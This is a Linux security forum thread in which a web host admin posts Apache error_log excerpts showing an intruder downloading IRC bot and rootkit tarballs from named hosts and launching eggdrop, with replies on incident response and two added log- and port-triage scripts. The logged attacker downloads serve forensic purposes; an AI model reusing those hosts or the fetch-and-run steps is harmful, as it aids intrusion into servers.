Linux - Security: This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
11-14-2005, 12:36 AM | #1 | Member | Registered: Oct 2003 | Location: Nebraska | Distribution: SuSE 9.0, Redhat 9.0 | Posts: 41
Am I in trouble?? Is this an attack or exploit?
We are running a webserver with RedHat 9.0 using Apache 2. We download a .tar file to a remote computer every week and it has all of the backup files in it for the websites that we host. This week, when that remote computer did a Norton virus scan, it found 2 viruses in the backup tar file:
Hacktool.Rootkit
&
Linux.Jac.8759
They were hidden in a directory named ...
(The directory name was 3 dots, effectively making it hidden. The people who own the website account don't even use it, so I am almost 100% sure that this was not something they FTP'ed into it. It was under the public_html tree, so it was accessible with FTP (and apache). The account belongs to a local business, so I am sure that it wasn't anybody there that uploaded this.)
These viruses were found in 2 tar files that resided in this ... directory. They were eggz.tar and psy.tgz.tgz. I thought that, no matter how they got there, if I just delete them, no harm done.
Then, I got to looking in the Apache error_log and this is what I found:
Code:
--00:42:44-- http://imutz.biz/kucingku/perkakas_m...ggmbonx.tar.gz
=> `eggmbonx.tar.gz.1'
Resolving imutz.biz... done.
Connecting to imutz.biz[84.244.5.195]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 73.53 KB/s
50K .......... .......... .......... .......... .......... 11% 168.35 KB/s
100K .......... .......... .......... .......... .......... 17% 163.40 KB/s
150K .......... .......... .......... .......... .......... 23% 168.35 KB/s
200K .......... .......... .......... .......... .......... 29% 148.81 KB/s
250K .......... .......... .......... .......... .......... 35% 163.93 KB/s
300K .......... .......... .......... .......... .......... 41% 168.35 KB/s
350K .......... .......... .......... .......... .......... 47% 141.64 KB/s
400K .......... .......... .......... .......... .......... 53% 157.23 KB/s
450K .......... .......... .......... .......... .......... 59% 168.35 KB/s
500K .......... .......... .......... .......... .......... 65% 168.35 KB/s
550K .......... .......... .......... .......... .......... 71% 163.40 KB/s
600K .......... .......... .......... .......... .......... 77% 122.55 KB/s
650K .......... .......... .......... .......... .......... 83% 151.06 KB/s
700K .......... .......... .......... .......... .......... 89% 155.28 KB/s
750K .......... .......... .......... .......... .......... 95% 154.80 KB/s
800K .......... .......... .......... .... 100% 151.91 KB/s
00:42:50 (146.40 KB/s) - `eggmbonx.tar.gz.1' saved [854356/854356]
--00:43:16-- http://imutz.biz/kucingku/perkakas_m...ggmbonx.tar.gz
=> `eggmbonx.tar.gz.2'
Resolving imutz.biz... done.
Connecting to imutz.biz[84.244.5.195]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 83.33 KB/s
50K .......... .......... .......... .......... .......... 11% 168.35 KB/s
100K .......... .......... .......... .......... .......... 17% 163.40 KB/s
150K .......... .......... .......... .......... .......... 23% 168.92 KB/s
200K .......... .......... .......... .......... .......... 29% 168.35 KB/s
250K .......... .......... .......... .......... .......... 35% 152.44 KB/s
300K .......... .......... .......... .......... .......... 41% 168.35 KB/s
350K .......... .......... .......... .......... .......... 47% 141.64 KB/s
400K .......... .......... .......... .......... .......... 53% 157.23 KB/s
450K .......... .......... .......... .......... .......... 59% 168.35 KB/s
500K .......... .......... .......... .......... .......... 65% 112.87 KB/s
550K .......... .......... .......... .......... .......... 71% 138.89 KB/s
600K .......... .......... .......... .......... .......... 77% 163.40 KB/s
650K .......... .......... .......... .......... .......... 83% 158.73 KB/s
700K .......... .......... .......... .......... .......... 89% 166.11 KB/s
750K .......... .......... .......... .......... .......... 95% 168.35 KB/s
800K .......... .......... .......... .... 100% 161.94 KB/s
00:43:22 (148.38 KB/s) - `eggmbonx.tar.gz.2' saved [854356/854356]
--00:44:37-- http://imutz.biz/kucingku/perkakas_m...ggmbonx.tar.gz
=> `eggmbonx.tar.gz.3'
Resolving imutz.biz... done.
Connecting to imutz.biz[84.244.5.195]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 73.64 KB/s
50K .......... .......... .......... .......... .......... 11% 167.79 KB/s
100K .......... .......... .......... .......... .......... 17% 148.81 KB/s
150K .......... .......... .......... .......... .......... 23% 168.92 KB/s
200K .......... .......... .......... .......... .......... 29% 167.22 KB/s
250K .......... .......... .......... .......... .......... 35% 164.47 KB/s
300K .......... .......... .......... .......... .......... 41% 168.35 KB/s
350K .......... .......... .......... .......... .......... 47% 167.79 KB/s
400K .......... .......... .......... .......... .......... 53% 164.47 KB/s
450K .......... .......... .......... .......... .......... 59% 168.35 KB/s
500K .......... .......... .......... .......... .......... 65% 168.35 KB/s
550K .......... .......... .......... .......... .......... 71% 163.93 KB/s
600K .......... .......... .......... .......... .......... 77% 168.35 KB/s
650K .......... .......... .......... .......... .......... 83% 163.40 KB/s
700K .......... .......... .......... .......... .......... 89% 167.79 KB/s
750K .......... .......... .......... .......... .......... 95% 168.92 KB/s
800K .......... .......... .......... .... 100% 168.29 KB/s
00:44:43 (154.19 KB/s) - `eggmbonx.tar.gz.3' saved [854356/854356]
--00:45:26-- http://imutz.biz/kucingku/perkakas_m...ggmbonx.tar.gz
=> `eggmbonx.tar.gz.4'
Resolving imutz.biz... done.
Connecting to imutz.biz[84.244.5.195]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
0K .......... .......... .......... .......... .......... 5% 74.07 KB/s
50K .......... .......... .......... .......... .......... 11% 168.35 KB/s
100K .......... .......... .......... .......... .......... 17% 164.47 KB/s
150K .......... .......... .......... .......... .......... 23% 167.79 KB/s
200K .......... .......... .......... .......... .......... 29% 168.35 KB/s
250K .......... .......... .......... .......... .......... 35% 163.93 KB/s
300K .......... .......... .......... .......... .......... 41% 168.35 KB/s
350K .......... .......... .......... .......... .......... 47% 168.35 KB/s
400K .......... .......... .......... .......... .......... 53% 163.93 KB/s
450K .......... .......... .......... .......... .......... 59% 168.35 KB/s
500K .......... .......... .......... .......... .......... 65% 167.79 KB/s
550K .......... .......... .......... .......... .......... 71% 163.93 KB/s
600K .......... .......... .......... .......... .......... 77% 168.92 KB/s
650K .......... .......... .......... .......... .......... 83% 162.87 KB/s
700K .......... .......... .......... .......... .......... 89% 168.92 KB/s
750K .......... .......... .......... .......... .......... 95% 166.11 KB/s
800K .......... .......... .......... .... 100% 132.56 KB/s
00:45:31 (153.54 KB/s) - `eggmbonx.tar.gz.4' saved [854356/854356]
curl: (6) Couldn't resolve host 'eggmbonx.tar.gz'
% Total % Received % Xferd Average Speed Time Curr.
Dload Upload Total Current Left Speed
^M 0 834k 0 0 0 0 0 0 --:--:-- 0:00:00 --:--:-- 0^M 5 834k 5 49232 0 0 38949 0 0:00:21 0:00:01 0:00:20 72613^M 25 834k 25 214k 0 0 97172 0 0:00:08 0:00:02 0:00:06 128k^M 45 834k 45 381k 0 0 116k 0 0:00:07 0:00:03 0:00:04 142k^M 64 834k 64 541k 0 0 127k 0 0:00:06 0:00:04 0:00:02 147k^M 84 834k 84 701k 0 0 133k 0 0:00:06 0:00:05 0:00:01 149k^M100 834k 100 834k 0 0 134k 0 0:00:06 0:00:06 0:00:00 159k
Code:
--05:21:54-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.2'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.47]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 141.64 KB/s
50K .......... .......... .......... .......... .......... 72% 163.93 KB/s
100K .......... .......... .......... ........ 100% 172.78 KB/s
05:21:55 (157.19 KB/s) - `psy.tar.gz.2' saved [141323/141323]
--05:22:56-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.3'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.46]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 140.85 KB/s
50K .......... .......... .......... .......... .......... 72% 163.93 KB/s
100K .......... .......... .......... ........ 100% 172.78 KB/s
05:22:57 (156.83 KB/s) - `psy.tar.gz.3' saved [141323/141323]
--05:23:35-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.4'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.45]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 141.24 KB/s
50K .......... .......... .......... .......... .......... 72% 163.93 KB/s
100K .......... .......... .......... ........ 100% 172.78 KB/s
05:23:36 (157.01 KB/s) - `psy.tar.gz.4' saved [141323/141323]
--05:25:12-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.5'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.44]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 140.85 KB/s
50K .......... .......... .......... .......... .......... 72% 163.93 KB/s
100K .......... .......... .......... ........ 100% 171.22 KB/s
05:25:14 (156.47 KB/s) - `psy.tar.gz.5' saved [141323/141323]
--05:25:57-- http://zreg.info/tools/psy.tar.gz
=> `psy.tar.gz.6'
Resolving zreg.info... done.
Connecting to zreg.info[68.142.234.47]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,323 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 141.24 KB/s
50K .......... .......... .......... .......... .......... 72% 163.40 KB/s
100K .......... .......... .......... ........ 100% 172.78 KB/s
05:25:58 (156.83 KB/s) - `psy.tar.gz.6' saved [141323/141323]
Code:
mkdir: cannot create directory `...': Permission denied
--07:38:06-- http://geocities.com/kostputri/botz/eggz.tgz
=> `eggz.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,357,407 [application/x-compressed]
0K .......... .......... .......... .......... .......... 3% 132.98 KB/s
50K .......... .......... .......... .......... .......... 7% 163.40 KB/s
100K .......... .......... .......... .......... .......... 11% 168.35 KB/s
150K .......... .......... .......... .......... .......... 15% 169.49 KB/s
200K .......... .......... .......... .......... .......... 18% 162.87 KB/s
250K .......... .......... .......... .......... .......... 22% 168.35 KB/s
300K .......... .......... .......... .......... .......... 26% 168.92 KB/s
350K .......... .......... .......... .......... .......... 30% 163.40 KB/s
400K .......... .......... .......... .......... .......... 33% 79.74 KB/s
450K .......... .......... .......... .......... .......... 37% 48.83 MB/s
500K .......... .......... .......... .......... .......... 41% 75.87 KB/s
550K .......... .......... .......... .......... .......... 45% 168.92 KB/s
600K .......... .......... .......... .......... .......... 49% 167.79 KB/s
650K .......... .......... .......... .......... .......... 52% 163.93 KB/s
700K .......... .......... .......... .......... .......... 56% 168.35 KB/s
750K .......... .......... .......... .......... .......... 60% 164.47 KB/s
800K .......... .......... .......... .......... .......... 64% 167.22 KB/s
850K .......... .......... .......... .......... .......... 67% 168.35 KB/s
900K .......... .......... .......... .......... .......... 71% 164.47 KB/s
950K .......... .......... .......... .......... .......... 75% 167.79 KB/s
1000K .......... .......... .......... .......... .......... 79% 168.92 KB/s
1050K .......... .......... .......... .......... .......... 82% 163.93 KB/s
1100K .......... .......... .......... .......... .......... 86% 167.79 KB/s
1150K .......... .......... .......... .......... .......... 90% 168.35 KB/s
1200K .......... .......... .......... .......... .......... 94% 163.93 KB/s
1250K .......... .......... .......... .......... .......... 98% 168.35 KB/s
1300K .......... .......... ..... 100% 169.49 KB/s
07:38:15 (157.55 KB/s) - `eggz.tgz' saved [1357407/1357407]
--07:42:45-- http://geocities.com/kostputri/botz/netgate.tgz
=> `netgate.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338,976 [application/x-compressed]
0K .......... .......... .......... .......... .......... 15% 130.89 KB/s
50K .......... .......... .......... .......... .......... 30% 163.40 KB/s
100K .......... .......... .......... .......... .......... 45% 168.35 KB/s
150K .......... .......... .......... .......... .......... 60% 168.92 KB/s
200K .......... .......... .......... .......... .......... 75% 163.40 KB/s
250K .......... .......... .......... .......... .......... 90% 167.79 KB/s
300K .......... .......... .......... . 100% 172.40 KB/s
07:42:47 (160.31 KB/s) - `netgate.tgz' saved [338976/338976]
--07:56:01-- http://geocities.com/kostputri/botz/netgate.tgz
=> `netgate.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338,976 [application/octet-stream]
0K .......... .......... .......... .......... .......... 15% 132.98 KB/s
50K .......... .......... .......... .......... .......... 30% 162.87 KB/s
100K .......... .......... .......... .......... .......... 45% 168.35 KB/s
150K .......... .......... .......... .......... .......... 60% 168.92 KB/s
200K .......... .......... .......... .......... .......... 75% 163.93 KB/s
250K .......... .......... .......... .......... .......... 90% 167.79 KB/s
300K .......... .......... .......... . 100% 171.44 KB/s
07:56:03 (160.69 KB/s) - `netgate.tgz' saved [338976/338976]
[08:10] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:10] Listening at telnet port 4000 (all)
[08:10] Module loaded: transfer (with lang support)
[08:10] Module loaded: channels
[08:10] Module loaded: server
[08:10] Module loaded: ctcp
[08:10] Module loaded: irc
[08:10] Module loaded: share
[08:10] Module loaded: filesys (with lang support)
[08:10] Module loaded: notes (with lang support)
[08:10] Module loaded: console (with lang support)
[08:10] Module loaded: blowfish
[08:10] Module loaded: assoc (with lang support)
[08:10] Module loaded: wire (with lang support)
[08:10] ===============================
[08:10] NeTgaTE 9.2 LoadEd
[08:10] Reported any bugs to #NeTgaTE
[08:10] Question Go To #NeTgaTE-HeLp
[08:10] Email: admin@netgatetcl.cjb.net
[08:10] ===============================
[08:10] Creating channel file
[08:10] === Angelica: 0 channels, 0 users.
[08:22] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:22] Listening at telnet port 4000 (all)
[08:22] Module loaded: transfer (with lang support)
[08:22] Module loaded: channels
[08:22] Module loaded: server
[08:22] Module loaded: ctcp
[08:22] Module loaded: irc
[08:22] Module loaded: share
[08:22] Module loaded: filesys (with lang support)
[08:22] Module loaded: notes (with lang support)
[08:22] Module loaded: console (with lang support)
[08:22] Module loaded: blowfish
[08:22] Module loaded: assoc (with lang support)
[08:22] Module loaded: wire (with lang support)
[08:22] ===============================
[08:22] NeTgaTE 9.2 LoadEd
[08:22] Reported any bugs to #NeTgaTE
[08:22] Question Go To #NeTgaTE-HeLp
[08:22] Email: admin@netgatetcl.cjb.net
[08:22] ===============================
[08:22] Userfile loaded, unpacking...
[08:22] === Angelica: 2 channels, 5 users.
[08:25] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:25] Listening at telnet port 4001 (all)
[08:25] Module loaded: transfer (with lang support)
[08:25] Module loaded: channels
[08:25] Module loaded: server
[08:25] Module loaded: ctcp
[08:25] Module loaded: irc
[08:25] Module loaded: share
[08:25] Module loaded: filesys (with lang support)
[08:25] Module loaded: notes (with lang support)
[08:25] Module loaded: console (with lang support)
[08:25] Module loaded: blowfish
[08:25] Module loaded: assoc (with lang support)
[08:25] Module loaded: wire (with lang support)
[08:25] ===============================
[08:25] NeTgaTE 9.2 LoadEd
[08:25] Reported any bugs to #NeTgaTE
[08:25] Question Go To #NeTgaTE-HeLp
[08:25] Email: admin@netgatetcl.cjb.net
[08:25] ===============================
[08:25] Userfile loaded, unpacking...
[08:25] === Angelica: 2 channels, 5 users.
--08:41:42-- http://geocities.com/kostputri/pzy/psy.tgz.tgz
=> `psy.tgz.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 424,644 [application/x-compressed]
0K .......... .......... .......... .......... .......... 12% 132.28 KB/s
50K .......... .......... .......... .......... .......... 24% 163.40 KB/s
100K .......... .......... .......... .......... .......... 36% 168.35 KB/s
150K .......... .......... .......... .......... .......... 48% 168.35 KB/s
200K .......... .......... .......... .......... .......... 60% 163.93 KB/s
250K .......... .......... .......... .......... .......... 72% 168.35 KB/s
300K .......... .......... .......... .......... .......... 84% 168.35 KB/s
350K .......... .......... .......... .......... .......... 96% 163.93 KB/s
400K .......... .... 100% 179.16 KB/s
08:41:45 (161.74 KB/s) - `psy.tgz.tgz' saved [424644/424644]
--08:42:55-- http://geocities.com/kostputri/botz/netgate.tgz
=> `netgate.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338,976 [application/x-compressed]
0K .......... .......... .......... .......... .......... 15% 132.63 KB/s
50K .......... .......... .......... .......... .......... 30% 163.40 KB/s
100K .......... .......... .......... .......... .......... 45% 168.35 KB/s
150K .......... .......... .......... .......... .......... 60% 168.92 KB/s
200K .......... .......... .......... .......... .......... 75% 163.40 KB/s
250K .......... .......... .......... .......... .......... 90% 168.35 KB/s
300K .......... .......... .......... . 100% 171.44 KB/s
08:42:57 (160.69 KB/s) - `netgate.tgz' saved [338976/338976]
[08:46] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:46] Listening at telnet port 4000 (all)
[08:46] Module loaded: transfer (with lang support)
[08:46] Module loaded: channels
[08:46] Module loaded: server
[08:46] Module loaded: ctcp
[08:46] Module loaded: irc
[08:46] Module loaded: share
[08:46] Module loaded: filesys (with lang support)
[08:46] Module loaded: notes (with lang support)
[08:46] Module loaded: console (with lang support)
[08:46] Module loaded: blowfish
[08:46] Module loaded: assoc (with lang support)
[08:46] Module loaded: wire (with lang support)
[08:46] ===============================
[08:46] NeTgaTE 9.2 LoadEd
[08:46] Reported any bugs to #NeTgaTE
[08:46] Question Go To #NeTgaTE-HeLp
[08:46] Email: admin@netgatetcl.cjb.net
[08:46] ===============================
[08:46] Userfile loaded, unpacking...
[08:46] === Angelica: 2 channels, 5 users.
mkdir: cannot create directory `leech': Permission denied
chmod: failed to get attributes of `leech': No such file or directory
ls: .: Permission denied
ls: .: Permission denied
There are many more of these entries there, but you get the idea. That last one particularly worries me, because I did not install eggdrop, nor did I even know what eggdrop was until I just googled it. (IRC Bot). Why are these wget outputs in the APACHE error_log??? What has happened?? Is this bad? What should I do??
Here are the results of "nmap -sT localhost":
Code:
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on localhost.localdomain (127.0.0.1):
(The 1587 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop-3
111/tcp open sunrpc
143/tcp open imap2
443/tcp open https
783/tcp open hp-alarm-mgr
953/tcp open rndc
3306/tcp open mysql
6000/tcp open X11
10000/tcp open snet-sensor-mgmt
Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds
I should have paid more attention before, but I am almost certain that all of these ports weren't open before. The ones that look suspicious to me are 111, 783, and 953. I know for a fact that we are not using anything on these ports. We use the others.
Louie
11-14-2005, 12:37 AM | #2 | Member (Original Poster) | Registered: Oct 2003 | Location: Nebraska | Distribution: SuSE 9.0, Redhat 9.0 | Posts: 41
Here are a few more that were in there. I was going to post them above, but it said my post was too long.
Code:
--10:52:32-- http://freewebs.com/datax/psy.tar.gz
=> `psy.tar.gz.2'
Resolving freewebs.com... done.
Connecting to freewebs.com[38.119.100.16]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,213 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 131.93 KB/s
50K .......... .......... .......... .......... .......... 72% 168.35 KB/s
100K .......... .......... .......... ....... 100% 166.97 KB/s
10:52:33 (152.72 KB/s) - `psy.tar.gz.2' saved [141213/141213]
--10:54:24-- http://freewebs.com/datax/psy.tar.gz
=> `psy.tar.gz.3'
Resolving freewebs.com... done.
Connecting to freewebs.com[38.119.100.15]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 141,213 [application/x-tar]
0K .......... .......... .......... .......... .......... 36% 86.36 KB/s
50K .......... .......... .......... .......... .......... 72% 490.20 KB/s
100K .......... .......... .......... ....... 100% 166.24 KB/s
10:54:25 (151.71 KB/s) - `psy.tar.gz.3' saved [141213/141213]
Code:
--04:26:14-- http://wawanhack.t35.com/tool/tembak.c
=> `tembak.c'
Resolving wawanhack.t35.com... done.
Connecting to wawanhack.t35.com[66.45.237.211]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://freehostcp.t35.com/404b.html [following]
--04:26:14-- http://freehostcp.t35.com/404b.html
=> `404b.html.1'
Resolving freehostcp.t35.com... done.
Connecting to freehostcp.t35.com[66.45.237.214]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 943 [text/html]
0K 100% 920.90 KB/s
04:26:14 (920.90 KB/s) - `404b.html.1' saved [943/943]
Louie
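The transcripts above are wget and curl progress output, which both tools write to stderr; Apache sends the stderr of its CGI/PHP children to error_log, which is how they end up there. As an added example that is not part of the thread, the script below pulls those indicators (fetch headers, completed downloads, curl errors, eggdrop banners, the failed mkdir of the "..." directory) out of an error_log and counts fetches per remote host; the sample log is constructed with placeholder hosts, not the ones quoted in posts #1 and #2.

```shell
#!/bin/sh
# Added example, not from the thread: extract the indicators the original poster
# found in Apache error_log (wget transcripts, curl errors, eggdrop banners and
# the failed mkdir of the "..." directory) and count fetches per remote host.
# wget and curl report progress on stderr, and Apache sends the stderr of its
# CGI/PHP children to error_log, which is why such transcripts end up there.

# Constructed sample shaped like the lines quoted in posts #1 and #2; the hosts
# and addresses are placeholders, not the ones from the thread.
sample_error_log() {
    cat <<'EOF'
--00:42:44--  http://dl.example.invalid/tools/eggmbonx.tar.gz
           => `eggmbonx.tar.gz.1'
Resolving dl.example.invalid... done.
Connecting to dl.example.invalid[192.0.2.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 854,356 [application/x-gzip]
    0K .......... .......... .......... .......... ..........  5%   73.53 KB/s
  800K .......... .......... .......... ....                 100%  151.91 KB/s
00:42:50 (146.40 KB/s) - `eggmbonx.tar.gz.1' saved [854356/854356]
curl: (6) Couldn't resolve host 'eggmbonx.tar.gz'
mkdir: cannot create directory `...': Permission denied
--07:38:06--  http://web.example.invalid/botz/eggz.tgz
           => `eggz.tgz'
07:38:15 (157.55 KB/s) - `eggz.tgz' saved [1357407/1357407]
[08:10] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:10] Listening at telnet port 4000 (all)
[08:22] --- Loading eggdrop v1.6.10 (Mon Nov 7 2005)
[08:22] Listening at telnet port 4000 (all)
--08:41:42--  http://web.example.invalid/pzy/psy.tgz.tgz
           => `psy.tgz.tgz'
08:41:45 (161.74 KB/s) - `psy.tgz.tgz' saved [424644/424644]
[Mon Nov 14 00:41:12 2005] [error] [client 192.0.2.55] File does not exist: /var/www/html/favicon.ico
EOF
}

# Read an error_log on stdin and print one tagged line per indicator:
#   fetch TIME HOST URL      wget request header
#   saved TIME FILE BYTES    wget completion line
#   curl LINE                curl failure
#   bot TIME eggdrop         eggdrop start-up banner
#   bot-listen TIME PORT     port the bot opened
#   mkdir-denied DIR         directory creation that failed
#   host HOST COUNT          fetches per remote host (printed at the end)
scan_error_log() {
    awk '
    /^--[0-9][0-9]:[0-9][0-9]:[0-9][0-9]--/ {
        url = $2; split(url, p, "/"); host = p[3]
        print "fetch", substr($1, 3, 8), host, url
        fetches[host]++
        next
    }
    / saved \[[0-9]+\// {
        f = $0; sub(/.*`/, "", f); sub(/. saved .*/, "", f)
        b = $0; sub(/.*\[/, "", b); sub(/\/.*/, "", b)
        print "saved", $1, f, b
        next
    }
    /^curl: \([0-9]+\)/ { print "curl", $0; next }
    /--- Loading eggdrop/ {
        t = $1; gsub(/[][]/, "", t); print "bot", t, "eggdrop"; next
    }
    /Listening at telnet port/ {
        t = $1; gsub(/[][]/, "", t); print "bot-listen", t, $(NF-1); next
    }
    /^mkdir: cannot create directory/ {
        d = $0; sub(/.*`/, "", d); sub(/.: Permission denied.*/, "", d)
        print "mkdir-denied", d
        next
    }
    END { for (h in fetches) print "host", h, fetches[h] }
    '
}

# Stand-alone run over the constructed sample. On a real server, replace the
# sample with: scan_error_log < /var/log/httpd/error_log
sample_error_log | scan_error_log
```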
11-14-2005, 02:16 AM | #3 | Senior Member | Registered: Mar 2003 | Distribution: Fedora | Posts: 3,658
Looks like typical cracker irc stuff...eggdrop..psybnc
It appears pretty clear that you were cracked, so taking the system offline, doing a full format and re-installation from trusted media is an absolute requirement for you to ever be able to trust the system. It's likely that the viruses were uploaded onto the system as part of an infected cracking tool. Not that surprising given that a significant portion of public cracking tools are infected.
I'd recommend taking a listing of all the processes as well as the contents of /proc (just make a compressed tar archive), take a listing of network connections using lsof -i or netstat and then take the system offline. If you wish to do forensic analysis of the system, you can make an image of the compromised drive and perform your analysis on that.
As far as how the system was compromised, what services were you running? Were you keeping the system updated? If you were running a website, what type of content was on it, static pages or dynamic stuff like CGI or PHP? Any of the usual suspects like phpBB or AWStats? Did you use a reasonable password policy?
Last edited by Capt_Caveman; 11-14-2005 at 02:17 AM.
11-14-2005, 11:32 AM | #4 | Member (Original Poster) | Registered: Oct 2003 | Location: Nebraska | Distribution: SuSE 9.0, Redhat 9.0 | Posts: 41
Thanks for the response!
I am a relative newbie to Linux and I know next to nothing about "cracking", so could you explain a little deeper??
When you said "typical cracker irc stuff", what did you mean by that? Is this common?? And when you say "infected cracking tool", do you mean the person using the tool was just trying to crack in, but since it was infected, it also created viruses on the machine??
As far as how the system was compromised, the ... hidden directory was found inside the directory tree of a PHP statistics program that we install for all of our websites. It is called BBClone ( www.bbclone.de). Could it have been a security flaw in this that made it possible for this to happen?? If so, I will have to uninstall it from all websites.
Louie
11-14-2005, 11:50 AM | #5 | LQ Guru | Registered: Feb 2004 | Location: SE Tennessee, USA | Distribution: Gentoo, LFS | Posts: 11,354
Well, basically, "cracking" in this case refers to someone, unknown to you, installing a program on the computer and running it. This means that they were necessarily able to log on to it... they "cracked" system security. And they probably used the computer to relay Chat (IRC) traffic, perhaps "among other things."
What you have to do now is to remove the computer from the Internet, scrub it completely clean, and re-install everything from known-good sources. Then, en futuro, pay closer attention to security warnings and admonitions.
11-14-2005, 11:54 AM | #6 | Member (Original Poster) | Registered: Oct 2003 | Location: Nebraska | Distribution: SuSE 9.0, Redhat 9.0 | Posts: 41
Yes, I am planning a complete reinstall. Thanks for the help.
One more thing: do the ports 111, 783, and 953 being open sound like they could be part of this? Do they have anything to do with IRC?? Because I am almost sure that these ports were not open before.
Louie
11-14-2005, 10:33 PM | #7 | Senior Member | Registered: Mar 2003 | Distribution: Fedora | Posts: 3,658
Quote:
I am a relative newbie to Linux and I know next to nothing about "cracking", so could you explain a little deeper??
Cracker ...commonly called hacker... aka someone who has broken into your system.
Quote:
When you said "typical cracker irc stuff", what did you mean by that? Is this common??
Common IRC tools uploaded by a cracker onto a newly compromised machine. Things like IRC bots and bouncers.
Quote:
And when you say "infected cracking tool", do you mean the person using the tool was just trying to crack in, but since it was infected, it also created viruses on the machine??
Once someone has gained access to your machine, one of the first steps often taken is to upload a variety of utilities. Sometimes this includes network daemons (backdoors) so that they can access the system again, tools for performing local privilege elevation (aka root exploits), trojaned binaries and rootkits for hiding the presence/activity/files of the attacker, or simply things like irc bots. Very often these tools are infected with various linux viruses; in fact they're probably one of the most common sources of linux viruses in the wild. When the attacker compromises your system and uploads the infected file, your filesystem often gets infected as well.
Quote:
As far as how the system was compromised, the ... hidden directory was found inside the directory tree of a PHP statistics program that we install for all of our websites. It is called BBClone (www.bbclone.de). Could it have been a security flaw in this that made it possible for this to happen??
I can't really find anything about recent vulnerabilities; however, it seems like it hasn't been maintained for some time. So I would be concerned about it, especially given the number of PHP and bulletin-board related vulnerabilities over the last year. You might want to consider switching to something that's more actively maintained (though AWStats has had a less than stellar history lately). The
I also just noticed that you are running Redhat 9. How have you been keeping it updated/patched?
Quote:
One more thing: do the ports 111, 783, and 953 being open sound like they could be part of this? Do they have anything to do with IRC?? Because I am almost sure that these ports were not open before.
Not normally. Running "lsof -i" or "netstat -pantu" might help to figure out exactly what is listening on those ports. Both of those commands should output a PID number. Take that number and look up the binary in /proc/PID#/cmdline. If those ports were opened by the attacker, then that would indicate a full compromise, as normal users shouldn't be able to bind ports under 1024.
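As an added example that is not part of the thread, the script below does the listener triage suggested in posts #3 and #7: it takes every listening socket from "netstat -pantu" output, flags the ports the poster did not expect (marking those below 1024 as privileged), and looks each PID up under /proc. The netstat sample, its PIDs and the program names on ports 111, 783, 953 and 4000 are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the thread: the listener triage described in posts #3
# and #7. Take every listening socket from "netstat -pantu" output, flag the
# ports the poster does not expect, and look each PID up under /proc (cmdline,
# exe and cwd). Run netstat as root; otherwise the PID/Program column shows
# "-" for processes you do not own.

# Ports the original poster says the server legitimately uses (from the nmap
# output in post #1). 111, 783 and 953 are deliberately left out.
EXPECTED_PORTS="21 22 25 53 80 110 143 443 3306 6000 10000"

# Constructed sample of "netstat -pantu" output. The PIDs and program names are
# made up; port 4000 mirrors the "Listening at telnet port 4000" line in the
# eggdrop banner the poster found in error_log.
sample_netstat() {
    cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1044/httpd
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      655/portmap
tcp        0      0 0.0.0.0:783             0.0.0.0:*               LISTEN      27731/spamd
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      790/named
tcp        0      0 0.0.0.0:4000            0.0.0.0:*               LISTEN      30211/eggdrop
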